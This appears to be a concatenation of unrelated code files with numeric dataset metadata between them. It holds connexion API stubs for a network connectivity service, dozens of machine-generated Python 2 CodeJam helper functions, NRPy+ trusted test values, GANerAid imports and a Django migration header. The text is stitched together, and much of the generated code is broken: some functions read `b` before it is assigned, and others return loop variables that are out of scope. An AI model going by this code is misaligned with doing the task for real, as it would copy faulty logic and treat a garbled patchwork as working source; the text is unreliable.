def operations_create_connectivity_service_post(inline_object1=None): # noqa: E501
"""operations_create_connectivity_service_post
# noqa: E501
:param inline_object1:
:type inline_object1: dict | bytes
:rtype: TapiConnectivityCreateConnectivityService
"""
if connexion.request.is_json:
inline_object1 = InlineObject1.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_delete_connectivity_service_post(inline_object6=None): # noqa: E501
"""operations_delete_connectivity_service_post
# noqa: E501
:param inline_object6:
:type inline_object6: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
inline_object6 = InlineObject6.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def operations_get_connection_details_post(inline_object12=None): # noqa: E501
"""operations_get_connection_details_post
# noqa: E501
:param inline_object12:
:type inline_object12: dict | bytes
:rtype: TapiConnectivityGetConnectionDetails
"""
if connexion.request.is_json:
inline_object12 = InlineObject12.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectionDetails(TapiConnectivityGetconnectiondetailsOutput(
database.connection(inline_object12.input.connection_id_or_name)))
def operations_get_connection_end_point_details_post(inline_object13=None): # noqa: E501
"""operations_get_connection_end_point_details_post
# noqa: E501
:param inline_object13:
:type inline_object13: dict | bytes
:rtype: TapiConnectivityGetConnectionEndPointDetails
"""
if connexion.request.is_json:
inline_object13 = InlineObject13.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectionEndPointDetails(TapiConnectivityGetconnectionendpointdetailsOutput(
database.connection_end_point(inline_object13.input.topology_id_or_name,
inline_object13.input.node_id_or_name,
inline_object13.input.nep_id_or_name,
inline_object13.input.cep_id_or_name)))
def operations_get_connectivity_service_details_post(inline_object14=None): # noqa: E501
"""operations_get_connectivity_service_details_post
# noqa: E501
:param inline_object14:
:type inline_object14: dict | bytes
:rtype: TapiConnectivityGetConnectivityServiceDetails
"""
if connexion.request.is_json:
inline_object14 = InlineObject14.from_dict(connexion.request.get_json()) # noqa: E501
return TapiConnectivityGetConnectivityServiceDetails(TapiConnectivityGetconnectivityservicedetailsOutput(
database.connectivity_service(inline_object14.input.service_id_or_name)))
def operations_get_connectivity_service_list_post(): # noqa: E501
"""operations_get_connectivity_service_list_post
# noqa: E501
:rtype: TapiConnectivityGetConnectivityServiceList
"""
return TapiConnectivityGetConnectivityServiceList(TapiConnectivityGetconnectivityservicelistOutput(
database.connectivity_service_list()))
def operations_update_connectivity_service_post(inline_object27=None): # noqa: E501
"""operations_update_connectivity_service_post
# noqa: E501
:param inline_object27:
:type inline_object27: dict | bytes
:rtype: TapiConnectivityUpdateConnectivityService
"""
if connexion.request.is_json:
inline_object27 = InlineObject27.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
| 41.182339
| 556
| 0.800832
| 13,224
| 107,733
| 6.116984
| 0.017015
| 0.124019
| 0.080751
| 0.105327
| 0.946743
| 0.939388
| 0.926704
| 0.915244
| 0.898926
| 0.882335
| 0
| 0.014707
| 0.139753
| 107,733
| 2,615
| 557
| 41.198088
| 0.85812
| 0.542211
| 0
| 0.559761
| 0
| 0
| 0.048704
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.308765
| false
| 0
| 0.09761
| 0
| 0.715139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7af9cf07651e1f8f38bd381c8104d7aea10bc49a
| 18,550
|
py
|
Python
|
projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py
|
DynamicCodeSearch/CodeSeer
|
ee985ece7691691585952eb88565f0e08bdc9113
|
[
"MIT"
] | 5
|
2020-04-05T18:04:13.000Z
|
2021-04-13T20:34:19.000Z
|
projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py
|
DynamicCodeSearch/CodeSeer
|
ee985ece7691691585952eb88565f0e08bdc9113
|
[
"MIT"
] | 1
|
2020-04-29T21:42:26.000Z
|
2020-05-01T23:45:45.000Z
|
projects/src/main/python/CodeJam/Y12R5P1/lidaobing/generated_py_416e6bb71b9f462696a15c44a1c5682e.py
|
DynamicCodeSearch/CodeSeer
|
ee985ece7691691585952eb88565f0e08bdc9113
|
[
"MIT"
] | 3
|
2020-01-27T16:02:14.000Z
|
2021-02-08T13:25:15.000Z
|
import sys
sys.path.append('/home/george2/Raise/ProgramRepair/CodeSeer/projects/src/main/python')
from CodeJam.Y12R5P1.lidaobing.A import *
def func_b21629aeedcc4506bd98fdca617b8110(b1, a0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
return t1
def func_1f21dc2c030e43b79682e619fb0ad0c1(b1, a0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
return t2
def func_d53b6ae4f2e74a9b86547cecc58c127c(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t2
def func_ff5f20fd299749928c1688ee83671fe8(t2, t1):
if t1 < t2:
return -1
return 1
def func_85d05fb5f1f149e6ad753074ca8ed29e(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t1
def func_7a04110b62cd42bb9681703246cc5c72(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
return t2
def func_8fce2d18b1024bf681c5b53e1fff3b3b(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t2
def func_9ee65ad6d5954368a2fd49282fe0ce3d(t2, i1, i0, t1):
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
def func_a0bb0d462148497887e8a07735209082(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t2
def func_f934468f89cb45c8a4b70346569a4385(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return t1
def func_47ec88d4e6114641bfbabfb467600948(i1, i0, b0, a1, t1):
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
def func_12401b870b684b4f95bdb7de5924e4ba(b1, i1, a0, i0, b0, a1):
t1 = a0 * (100 - b1)
t2 = a1 * (100 - b0)
if t1 == t2:
return i0 - i1
if t1 < t2:
return -1
return 1
def func_b6b2c5c5fb1a487481c3c11cc50b2c4c(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return a
def func_028c9d6a82fe4a49896a39afd6bf2cb0(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return n
def func_04e45c4df0b94764a279ca197bc13993(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
return x
def func_b7d16fcfc676481985537cb0eb07cd14(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return x
def func_641a3673eeff4aa1afae8f144cbf5735(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return b
def func_36f8f8ff5ddc4ac882f2778373ab5dfe(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return a
def func_ee52b9da72844a14bc1c6ecc0f3d5041(ifile):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_1ea389778d3a4ee68ee98bb4e913866f(ifile):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_76dabfa7c1e549d7ba2008573d6a4676(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_faf7dddfbdf9413fa36f1852e194e48b(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_bbd46932ae2a46aa818791d32067e497(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_f5b7e05ab84d4bd68748a499420d1ccd(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_0bf8a26b6c49449ebc9d346e9132115d(n, b, a):
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_18d6b2dd29bc4c2ba4b3062baaa05882(n, b, a):
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_4b9d73c090e04e8cb8f959ee7cd8b6e4(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return b
def func_4821faf4c781449684cb39c0a063e9e4(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return a
def func_85a77d7221c645a1858a73b74c68061c(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return n
def func_f2d5d6e16d3d4e93bf010bc6e17357a7(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
return x
def func_61e46193133344879a73f2cfda5bede7(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_b2db179e4c034907a1ba2cc84230f1fc(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_7533a65bf1284707985c77fc64d0c2fe(ifile):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return a
def func_c8590f26fe7a4b16be859434fff1ee0d(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_879d894ad26b40ee82f9dd62ccba185f(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_76529abb087249698e192d7cb0dbdcd9(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_bd01feca9b5948dca0a1ae06a7a83527(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_33f402c50113497baa53c5aa744bcd31(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_8f8517388f844a619023df51cf91a4c3(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_a598d1abfaa24c0db0b2cfbfd1c45ef8(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_8a57b381827442328bc7c02971e9ef2c(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_4166d316af9a47299cd7d34a20dc36a6(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return n
def func_4ff86d440c0e493fbe303c7a6ca7672d(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return b
def func_6499b5ab034a4866820b675a3d6527b0(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return x
def func_a3f5590e2a6d4d1f8bf795922e510fec(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
return a
def func_9fd91330916b45ca9699b1a84bf0c169(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return a
def func_8613d1fc3c674df5a3918610d0ececdc(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_64d04298ce6445989deed97ceee02a76(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_987dea216a844058a19db58a925b3be9(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_0ea5f47350ab48b1914929b3a87cc92b(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_cbd9c13fb31f47248276bba6cc56c5b5(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_71eb0c0b770446df99efdc16df567fae(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_20379ff73d704c6d93c0860c0621951a(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_bcecd5e8b92544359db5cbf8f70b0365(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_3795ba7bf99e4f8699aedeba629d62a2(n, a):
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_27501f4426b14800b48759a7438ec720(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return n
def func_26bbde5fc6b7421d9511fbb96f693043(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return a
def func_814bf6ab53c04ff3bd47a766fbd6b033(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return i
def func_748b857b32554510ab3f9ce39ed73e99(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return c
def func_a070153e7d6f4a40ab87d07627aa643f(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return x
def func_cb99a173a8a8426a97866a2253418376(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
return b
def func_4cf63dab3b94472a9ed381e23322e7d2(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_2208fe3be570469d8cb2d1755755c64f(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_ce761dfdda6b41eea917feb83f900fe0(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_47152c1a10c74e429b9f0b1505bfdc9b(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_cbec1b258b7b4ba984df8ceda939af11(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return a
def func_eafa6ce6b19b4fa6aca5588cba2e772f(ifile, n, a):
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_61b13cb389d54a3ea3a07a327e388b67(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return i
def func_6f31e22478cf47b48ad700a048d72ac5(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return n
def func_353be2f06c7d49269f372ed5a5a49d0f(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return b
def func_c8d99ee814dc4adf889a14b49df2005b(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return a
def func_dff86119810e4082b8d94abfe7269e45(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return x
def func_7445f1b69ebc4400a682151247b99769(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return c
def func_780e59c9d95c4b538c3638b58effef52(ifile, n):
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_46fdf5677b314175b44429eb4dbf52e3(ifile):
n = int(ifile.readline())
a = [int(x) for x in ifile.readline().split()]
b = [int(x) for x in ifile.readline().split()]
b = [(100.0 - x) for x in b]
c = [(i, a[i], b[i]) for i in range(n)]
c = sorted(c, cmp=cmp1)
return ' '.join([str(x[0]) for x in c])
def func_196a1e8258674fe59110fd2226fc4d39():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
return n
def func_2a8b4838b3c34fc59dc4a532e844a828():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
return ifile
def func_e5a27358beee438cbe2a29165f0b793f(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return i
def func_2325808604e84f1684f82c2c10e96de5(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return n
def func_5744fca327334117a22f7e62f2cc2b19(n, ifile):
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_2b69b3287b734e3b87af4cb9e855b41a():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return i
def func_8fba89633c5747f79689e23a22c67751():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return ifile
def func_e578810c598442c6bd0ff33296b8f226():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
return n
def func_473c09f63cf94921b0e4e3884b348d7d(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return n
def func_f00218d1e51641cabefcb6d3806916f1(ifile):
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_02329a4f087145f3aade3ac4547faa94():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return i
def func_8606d4a36ce447c4b3dde55ea7a5771f():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return ifile
def func_de8186583fec438cb339ef25fe2391ac():
ifile = open('codejam/test_files/Y12R5P1/A.in')
n = int(ifile.readline())
for i in range(n):
print 'Case #%d: %s' % (i + 1, foo(ifile))
ifile.close()
return n
| 27.040816
| 86
| 0.58965
| 3,005
| 18,550
| 3.607987
| 0.048918
| 0.053496
| 0.080244
| 0.091035
| 0.71758
| 0.717211
| 0.717211
| 0.717211
| 0.717211
| 0.714721
| 0
| 0.162804
| 0.244043
| 18,550
| 685
| 87
| 27.080292
| 0.610354
| 0
| 0
| 0.821569
| 0
| 0
| 0.024313
| 0.016981
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003922
| null | null | 0.021569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb3ab167ce1cc80e88e00a0a36cb6d909cb1d11d
| 2,073
|
py
|
Python
|
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | 1
|
2019-12-23T05:31:25.000Z
|
2019-12-23T05:31:25.000Z
|
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | null | null | null |
Maxwell/tests/trusted_values_dict.py
|
ksible/nrpytutorial
|
4ca6e9da22def2a9c9bcbcad75847fd1db159f4b
|
[
"BSD-2-Clause"
] | 2
|
2019-11-14T03:31:18.000Z
|
2019-12-12T13:42:52.000Z
|
from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-08-09
trusted_values_dict['MaxwellCartesian_ID_System_I__MaxwellCartesian_ID__globals'] = {'AidD[0]': mpf('0.0'), 'AidD[1]': mpf('0.0'), 'AidD[2]': mpf('0.0'), 'EidD[0]': mpf('-0.00097872468362340314605833563251625'), 'EidD[1]': mpf('0.00145603432525138889836187271486631'), 'EidD[2]': mpf('0.00715458022830078274232579882161936'), 'psi_ID': mpf('0.0')}
# Generated on: 2019-08-09
trusted_values_dict['MaxwellCartesian_ID_System_II__MaxwellCartesian_ID__globals'] = {'AidD[0]': mpf('0.0'), 'AidD[1]': mpf('0.0'), 'AidD[2]': mpf('0.0'), 'EidD[0]': mpf('-0.00097872468362340314605833563251625'), 'EidD[1]': mpf('0.00145603432525138889836187271486631'), 'EidD[2]': mpf('0.00715458022830078274232579882161936'), 'psi_ID': mpf('0.0')}
# Generated on: 2019-09-01
trusted_values_dict['MaxwellCartesian_Evol_System_I__MaxwellCartesian_Evol__globals'] = {'ArhsD[0]': mpf('-1.00477972570544082930865670277853'), 'ArhsD[1]': mpf('-0.90933746004565019216414611946675'), 'ArhsD[2]': mpf('-1.35077580602625568761965269004577'), 'ErhsD[0]': mpf('-1.16609030551770015540915913490108'), 'ErhsD[1]': mpf('-1.74087427825341859356723017723538'), 'ErhsD[2]': mpf('-1.30944694400130436898902550312893'), 'psi_rhs': mpf('-1.83203053745211606147965285066827'), 'Cviolation': mpf('0.406620534858606586636231871034108')}
# Generated on: 2019-09-01
trusted_values_dict['MaxwellCartesian_Evol_System_II__MaxwellCartesian_Evol__globals'] = {'ArhsD[0]': mpf('-1.00477972570544082930865670277853'), 'ArhsD[1]': mpf('-0.90933746004565019216414611946675'), 'ArhsD[2]': mpf('-1.35077580602625568761965269004577'), 'ErhsD[0]': mpf('-6.01063531302656695008599192642279'), 'ErhsD[1]': mpf('2.34503060736374273411073958457946'), 'ErhsD[2]': mpf('-2.01267184443281847814748713664109'), 'psi_rhs': mpf('-0.467406274906266405722021772817243'), 'Gamma_rhs': mpf('-1.83022327141949924992491839801391'), 'Cviolation': mpf('0.406620534858606586636231871034108')}
| 115.166667
| 595
| 0.759768
| 231
| 2,073
| 6.61039
| 0.238095
| 0.049771
| 0.026195
| 0.086444
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0.629993
| 0
| 0.433367
| 0.051616
| 2,073
| 17
| 596
| 121.941176
| 0.343337
| 0.047757
| 0
| 0
| 1
| 0
| 0.670391
| 0.538852
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24780dcc9f7bdb0ec8457b019da3ce395ca3e795
| 206
|
py
|
Python
|
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | 1
|
2021-07-05T16:35:25.000Z
|
2021-07-05T16:35:25.000Z
|
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | null | null | null |
GANerAid/__init__.py
|
TeamGenerAid/GANerAid
|
b6d68833f9483e1215e1547f54a207927c5685e6
|
[
"MIT"
] | null | null | null |
import GANerAid.ganeraid
import GANerAid.utils
import GANerAid.data_preprocessor
import GANerAid.evaluation_report
import GANerAid.experiment_runner
import GANerAid.experiment_runner
import GANerAid.logger
| 25.75
| 33
| 0.898058
| 25
| 206
| 7.24
| 0.4
| 0.541436
| 0.265193
| 0.331492
| 0.40884
| 0.40884
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067961
| 206
| 7
| 34
| 29.428571
| 0.942708
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
24a2cce00762e7f1865ae5e5e55ed1a33f953844
| 13,667
|
py
|
Python
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 13
|
2018-08-30T16:03:18.000Z
|
2019-11-25T07:08:43.000Z
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 814
|
2018-08-30T02:28:55.000Z
|
2022-03-11T23:31:45.000Z
|
partners/migrations/0005_auto_20191024_1225.py
|
uno-isqa-8950/uno-cpi
|
c8fa01eb253e6a56046009c551a84c36c28cd8da
|
[
"MIT"
] | 6
|
2018-09-16T05:35:49.000Z
|
2019-10-17T02:44:19.000Z
|
# Generated by Django 2.2.1 on 2019-10-24 17:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
